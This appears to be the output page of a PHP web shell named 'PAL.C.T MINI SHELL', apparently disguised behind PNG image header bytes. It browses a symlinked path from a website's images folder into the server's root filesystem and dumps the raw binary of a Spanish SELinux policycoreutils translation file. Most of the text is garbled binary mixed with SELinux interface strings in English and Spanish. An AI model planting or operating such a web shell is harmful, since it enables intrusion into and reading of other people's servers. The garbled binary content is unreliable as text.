php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/es/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/es/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"F+DVtON2?Pr*Ý:7)aenӞ
,H)^! ŸC"7Z`ue{i.K1z\D	9N=(TB}]T"s,)ä%..BVqTȥ[Φ"*<M/-.;#STwN̨jDW˩5#;Yf<79Yq/˫2>.1mhW1`1t,,Ӯ;W<%*1"\A ʰ7+;Bg?1&'CkKǵֵP(C#l1!¶1(6$_;64D,5qG5$%/J+z"%ɹ&$';/c$/׺%$-'R"z!0 5"G+j-,#*5*`%!.ӽ$.'1V2.۾
**%U#{3#ӿ6$.S%s.3#$ #E$i?%%+0F2w1/0$=/bHEF!Ch"M1<O9:;==:{;<@/=p>?)-1W(+
$	3=X%m>49=BwB9678n..7;=9y<-<8[:880A-r9:=;S;@M;Z49;<A;~/1/9L<;;;;=w;==/>m4=?>_599>H=:9H:=:>F;;:>:8@s;==.;l==;$<`9:92L;<:<3<p;=:':b::9:M1;=942n?=?2_@/==A:91;&=b;04
6B:y0<=":`:;?CR>2D;M>:;;?;{<;?0;p9=:$:_=G9 <Z;>@:S9>=;E<>=9;6u99< <]!8J0M\~b	d9n_HQ"l!,1->,U&*(0.!M+o))O
?Jf"yQ(0z"	
B& i)K$:
CN jS#3w		


%	%/Ub(@LI[bfjq
!"(/DV	cmt!B!
/AFW4
	
*&7&^#)$D@a"-'B"Sv
#L0G}'#%AU@]W,A$*#BNR-&*Q
o}A=>Ums3*:*e}	6	6	4
AM
H
C
AC^J:.
#9
*]
'
$

#

	+5J`y+(4	>gVW|,:5;pY6O	S$]9D29	lv@.6o#22.0_/x$"A ^ $#(0KY	)9<AM&]Nk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: policycoreutils.HEAD.es
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-08-31 17:40-0300
Last-Translator: Claudio Rodrigo Pereyra Diaz <claudio@pereyradiaz.com.ar>
Language-Team: Spanish <en@li.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: 
X-Generator: KBabel 1.11.4
Plural-Forms: nplurals=2; plural=(n != 1);
X-Poedit-Language: Spanish
X-Poedit-Country: ARGENTINA
%s etiquetas cambiadas.
%s ya está en %s%s no es un contexto válido
%s no está en %s%s debe ser un directorio¡%s!  No se pudo obtener el contexto actual para %s, no se reetiqueta el tty.
¡%s!  No se pudo obtener un contexto nuevo para %s, no se reetiqueta el tty.
¡%s!  No se pudo fijar el nuevo contexto para %s
%s:  no se puede cargar la política y se está pidiendo el modo obediente:  %s
%s:  no se puede cargar la política:  %s
%s: la política ya fue cargada y su carga inicial pedida
******************** IMPORTANTE **********************
...600-1024<b>Aplicaciones</b><b>Usuarios que Ingresan</b><b>Usuarios Administrativos</b><b>Seleccionar:</b><b>Puertos TCP</b><b>Puertos UDP</b>AgregarAgregar %sDiálogo para Agregar BooleanosAgregar Contexto de ArchivoAgregar Puerto de RedAgregar la asignación de Ingreso SELinuxAgregar Puertos de Red de SELinuxAgregar Usuario SELinuxAgregar Mapeo de Usuario SELinuxAgregar UsuarioLa dirección %s está definido en la política, no se puede borrarLa dirección %s no está definidaAdminRol de Usuario AdminTodosPermitir al usuario SELinux webadm administrar los directorios de inicio de usuarios no privilegiadosPermitir a los usuarios webadm de SELinux leer los directorios de inicio de los usuarios no privilegiadosPermitir a Samba compartir los directorios nfsPermitir el acceso a red al demonio Spam AssassinPermitir al servidor X-Windows asignar una región de memoria como ejecutable y de escrituraPermitir a todos los demonios la habilidad de usar ttys no asignadasPermitir a los demonios escribir archivos principales a /Permitir a cdrecord leer varios contenidos. nfs, samba, dispositivos removibles, temporales del usuario y archivos de contenidos no confiablePermitir a los clientes escribir a la memoria compartida de XPermitir a los demonios ejecutar con NISPermitir a evolution y a thunderbird leer archivos de los usuariosPermitir a la cuenta gadmin de usuario SELinux ejecutar archivos en su directorio home o /tmpPermitir a la cuenta guest de SELinux ejecutar archivos en su directorio home o /tmpPermitir la pila ejecutable a javaPermitir a mount montar cualquier directorioPermitir a mount montar cualquier archivoPermitir a mplayer la pila ejecutablePermitir a los usuarios normales ejecutar pingPermitir a pppd correr para un usuario regularPermitir a las utilidades privilegiadas como hotplug e insmod ejecutarse no confinadasPermitir a los programas leer los archivos en ubicaciones no estándares (default_t)Permitir a los scripts de rc ejecutarse no confinados, incluyendo cualquier demonio iniciado en un script de rc que no tenga una transición de dominio explícitamente definidaPermitir a los usuarios regulares el acceso directo al ratón (solo permitir al servidor X)Permitir a rpm correr no confinadoPermitir al servidor de autenticación sasl leer /etc/shadowPermitir a spamd acceder a los directorios homePermitir al demonio squid conectarse a la redPermitir ingresos a ssh como sysadm_r:sysadm_tPermitir a ssh correr desde inetd en vez de como un demonioPermitir a ssh ejecutar ssh_keysignPermitir a la cuenta staff de SELinux ejecutar archivos en su directorio home o /tmpPermitir al los Navegadores Web del staff escribir a sus directorios de inicioPermitir a los usuarios staff_r buscar el directorio home de sysadm y leer archivos (tales como ~/.bashrc)Permitir al demonio stunnel correr como aplicación, fuera de xinetdPermitir a la cuenta sysadmin de SELinux ejecutar archivos en su directorio home o /tmpPermitir a sysadm_t iniciar directamente los demoniosPermitir al navegador mozilla leer archivos de los usuariosPermitir a las cuentas de usuario SELinux no confinadas ejecutar archivos en su directorio home o /tmpPermitir a las no confinadas a dyntrans a unconfined_execmemPermitir a los paquetes no etiquetados fluir por la redPermitir a las cuentas de usuarios SELinux ejecutar archivos en su directorio home o /tmpPermitir a los usuarios conectar a socket mysqlPermitir a los usuarios conectara  socket postgresPermitir a los usuarios l/e noextattrfile (FAT, CDROM, FLOPPY)Permitir a los usuarios hacer stat a archivos ttyPermitir a user_r llegar a sysadm_r vía su, sudo o userhelper. Sinó, solamente staff_r podrán hacerloPermitir a los usuarios controlar las interases de red (también necesita USERCTL=true)Permitir a los usuarios ejecutar el comando mountPermitir a los usuarios ejecutar servidores TCP (adjuntarse a puertos y aceptar conexiones entrantes desde el mismo dominio o usuarios externos) inhabilitando esto fuerza el modo pasivo de FTP y puede cambiar otros protocolosPermitir a los usuarios ejecutar el comando dmesgPermitir a los usuarios l/e dispositivos usbPermitir ingresos xdm como sysadm_r:sysadm_tPermitir a xen leer/escribir dispositivos de disco físicosPermitir a las cuentas xguest de SELinux ejecutar archivos en el directorio home o /tmpPermitir a xinetd correr no confinado, incluyendo cualquier servicio que inicie que no tenga una transición de dominio explícitamente definidaAplicación¿Está seguro que desea eliminar %s '%s'?Formato incorrecto %s: Registro %sBooleanoEl booleano %s está definido en la política, no se puede borrarEl booleano %s no está definidoNombre del BooleanoCVSNo se puede combinar +/- con otros tipos de categoríasNo se puede tener múltiples sensibilidadesNo se puede modificar los niveles de sensibilidad usando '+' en %sNo se puede encontrar su registro en el archivo shadow passwd.
No se puede leer el almacenamiento de políticas.Cambiar el modo de proceso a obedienteCambiar el modo de proceso a permisivo.El cambio del tipo de política puede causar un reetiquetado de todo el sistema de archivo en el siguiente arranque. El reetiquetado demora un tiempo largo, dependiendo del tamaño del sistema de archivo. ¿Desea continuar?El cambio de SELinux a inhabilitado requiere una reiniciada. No se recomienda. Si más tarde decide volver a activar SELinux, el sistema requerirá un reetiquetado. Si solo quiere ver si SELinux está causando un problema en su sistema, puede ir a modo permisivo que solamente registrará los errores pero no lo obligará a la política de SELinux. El modo permisivo no requiere una reiniciada. ¿Desea continuar?El cambio de SELinux a activado provocará el reetiquetado de todo el sistema de archivo en el siguiente arranque. El reetiquetado demora un tiempo largo, dependiendo del tamaño del sistema de archivo. ¿Desea continuar?CompatibilidadConfigurar SELinuxContextoCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>No se pudo agregar el usuario SELinux %sNo se pudo agregar la dirección %sNo se pudo agregar el contexto de archivo para %sNo se pudo agregar la interfaz %sNo se pudo agregar asignación de ingreso para %sNo se pudo agregar puerto %s/%sNo se pudo agregar el prefijo %s para %sNo se pudo agregar el rol %s para %sNo se pudo chequear si el usuario SELinux %s está definidoNo se pudo chequear si la dirección %s está definidaNo se pudo chequear si el booleano %s está definidoNo se pudo chequear si el contexto de archivo para %s está definidoNo se pudo chequear si la interfase %s está definidaNo se pudo chequear si la asignación de ingreso para %s está definidaNo se pudo chequear si el puerto %s/%s está definidoNo se pudo cerrar los descriptores.
